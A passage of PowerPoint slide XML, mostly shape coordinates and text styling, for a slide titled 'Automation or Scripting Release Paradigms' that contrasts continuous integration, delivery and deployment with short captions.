                  <a:pt x="4169118" y="46783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4205559" y="71397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238466" y="100361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4267430" y="133268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4292044" y="169709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4311900" y="209276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4326587" y="251559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335699" y="296152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4338828" y="342646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4338828" y="1713230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335699" y="1759723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4326587" y="1804316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4311900" y="1846599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4292044" y="1886166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4267430" y="1922607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238466" y="1955514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4205559" y="1984478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4169118" y="2009092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4129551" y="2028948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4087268" y="2043635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4042675" y="2052747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3996182" y="2055876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342646" y="2055876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296152" y="2052747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251559" y="2043635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209276" y="2028948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169709" y="2009092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133268" y="1984478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100361" y="1955514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71397" y="1922607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46783" y="1886166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26927" y="1846599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12240" y="1804316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3128" y="1759723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1713230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="342646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="39405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651761" y="5916548"/>
            <a:ext cx="329946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Commit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updates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often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51761" y="6681978"/>
            <a:ext cx="354076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Reduce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commit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conflicts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33955" y="4419600"/>
            <a:ext cx="3314700" cy="1191895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3314700" h="1191895">
                <a:moveTo>
                  <a:pt x="3116072" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="198627" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153075" y="5244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111263" y="20183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74384" y="43627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43627" y="74384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20183" y="111263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5244" y="153075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="198627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="993139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5244" y="1038692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20183" y="1080504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43627" y="1117383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74384" y="1148140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111263" y="1171584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153075" y="1186523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198627" y="1191767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3116072" y="1191767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3161624" y="1186523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203436" y="1171584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3240315" y="1148140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3271072" y="1117383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3294516" y="1080504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3309455" y="1038692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700" y="993139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700" y="198627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3309455" y="153075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3294516" y="111263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3271072" y="74384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3240315" y="43627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203436" y="20183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3161624" y="5244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3116072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779267" y="4581652"/>
            <a:ext cx="1624965" cy="79057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dirty="0" sz="2200" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Continuous</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="24765">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="90" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Integration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104382" y="5279897"/>
            <a:ext cx="4386580" cy="2051685"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4386580" h="2051684">
                <a:moveTo>
                  <a:pt x="0" y="341884"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3120" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341883" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4044188" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4090586" y="3120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4135085" y="12210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4177278" y="26862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4216757" y="46670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4253116" y="71226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4285948" y="100123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4314845" y="132955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4339401" y="169314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4359209" y="208793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4373861" y="250986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4382951" y="295485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4386071" y="341884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4386071" y="1709420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4382951" y="1755818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4373861" y="1800317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4359209" y="1842510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4339401" y="1881989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4314845" y="1918348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4285948" y="1951180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4253116" y="1980077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4216757" y="2004633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4177278" y="2024441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4135085" y="2039093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4090586" y="2048183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4044188" y="2051303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="341883" y="2051303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295485" y="2048183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250986" y="2039093"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208793" y="2024441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169314" y="2004633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132955" y="1980077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100123" y="1951180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71226" y="1918348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46670" y="1881989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26862" y="1842510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12210" y="1800317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3120" y="1755818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1709420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="341884"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="39405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332982" y="5871211"/>
            <a:ext cx="3488690" cy="79057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7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Pu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up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14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stagi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7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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="354965">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="370"/>
              </a:spcBef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infrastructure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40068" y="4419600"/>
            <a:ext cx="3313429" cy="1191895"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3313429" h="1191895">
                <a:moveTo>
                  <a:pt x="3114548" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="198627" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153075" y="5244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111263" y="20183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74384" y="43627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43627" y="74384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20183" y="111263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5244" y="153075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="198627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="993139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5244" y="1038692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20183" y="1080504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43627" y="1117383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74384" y="1148140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111263" y="1171584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="153075" y="1186523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198627" y="1191767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3114548" y="1191767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160100" y="1186523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3201912" y="1171584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238791" y="1148140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3269548" y="1117383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3292992" y="1080504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3307931" y="1038692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3313176" y="993139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3313176" y="198627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3307931" y="153075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3292992" y="111263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3269548" y="74384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238791" y="43627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3201912" y="20183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160100" y="5244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3114548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870318" y="4820158"/>
            <a:ext cx="285242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30" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Continuous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55" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Delivery</a:t>
            </a:r>
            <a:endParaRPr sz="22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927842" y="5275326"/>
            <a:ext cx="4338955" cy="2056130"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4338955" h="2056129">
                <a:moveTo>
                  <a:pt x="0" y="342646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3128" y="296152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12240" y="251559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26927" y="209276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46783" y="169709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71397" y="133268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100361" y="100361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133268" y="71397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169709" y="46783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209276" y="26927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251559" y="12240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296152" y="3128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342646" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3996181" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4042675" y="3128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4087268" y="12240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4129551" y="26927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4169118" y="46783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4205559" y="71397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238466" y="100361"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4267430" y="133268"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4292044" y="169709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4311900" y="209276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4326587" y="251559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335699" y="296152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4338827" y="342646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4338827" y="1713230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335699" y="1759723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4326587" y="1804316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4311900" y="1846599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4292044" y="1886166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4267430" y="1922607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4238466" y="1955514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4205559" y="1984478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4169118" y="2009092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4129551" y="2028948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4087268" y="2043635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4042675" y="2052747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3996181" y="2055876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342646" y="2055876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296152" y="2052747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="251559" y="2043635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209276" y="2028948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169709" y="2009092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133268" y="1984478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100361" y="1955514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71397" y="1922607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46783" y="1886166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26927" y="1846599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12240" y="1804316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3128" y="1759723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1713230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="342646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="39405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1156950" y="6059576"/>
            <a:ext cx="3225165" cy="7912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14199"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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Push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updated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code</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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to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production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1268265" y="4414837"/>
            <a:ext cx="3655060" cy="1201420"/>
            <a:chOff x="11268265" y="4414837"/>
            <a:chExt cx="3655060" cy="1201420"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11273028" y="4419600"/>
              <a:ext cx="3645535" cy="1191895"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3645534" h="1191895">
                  <a:moveTo>
                    <a:pt x="3446779" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="198627" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153075" y="5244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111263" y="20183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74384" y="43627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43627" y="74384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20183" y="111263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5244" y="153075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="198627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="993139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5244" y="1038692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20183" y="1080504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43627" y="1117383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74384" y="1148140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111263" y="1171584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153075" y="1186523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198627" y="1191767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3446779" y="1191767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3492332" y="1186523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534144" y="1171584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571023" y="1148140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3601780" y="1117383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3625224" y="1080504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3640163" y="1038692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3645408" y="993139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3645408" y="198627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3640163" y="153075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3625224" y="111263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3601780" y="74384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571023" y="43627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534144" y="20183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3492332" y="5244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3446779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1273028" y="4419600"/>
              <a:ext cx="3645535" cy="1191895"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3645534" h="1191895">
                  <a:moveTo>
                    <a:pt x="0" y="198627"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5244" y="153075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20183" y="111263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43627" y="74384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74384" y="43627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111263" y="20183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153075" y="5244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198627" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3446779" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3492332" y="5244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534144" y="20183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571023" y="43627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3601780" y="74384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3625224" y="111263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3640163" y="153075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3645408" y="198627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3645408" y="993139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3640163" y="1038692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3625224" y="1080504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3601780" y="1117383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3571023" y="1148140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3534144" y="1171584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3492332" y="1186523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3446779" y="1191767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198627" y="1191767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153075" y="1186523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111263" y="1171584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74384" y="1148140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43627" y="1117383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20183" y="1080504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5244" y="1038692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="993139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="198627"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525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12231751" y="4581652"/>
            <a:ext cx="1732914" cy="79057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66040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="470"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="30" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Continuous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 sz="2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Deployment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00755" y="2962655"/>
            <a:ext cx="1182623" cy="118262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05343" y="2990088"/>
            <a:ext cx="1182624" cy="1182624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504419" y="2990088"/>
            <a:ext cx="1182624" cy="1182624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69740" y="306451"/>
            <a:ext cx="771461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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Automation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-8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45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Paradigms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39439" y="760476"/>
            <a:ext cx="10116312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584197" y="5382005"/>
            <a:ext cx="4282440" cy="2056130"/>
          </a:xfrm>
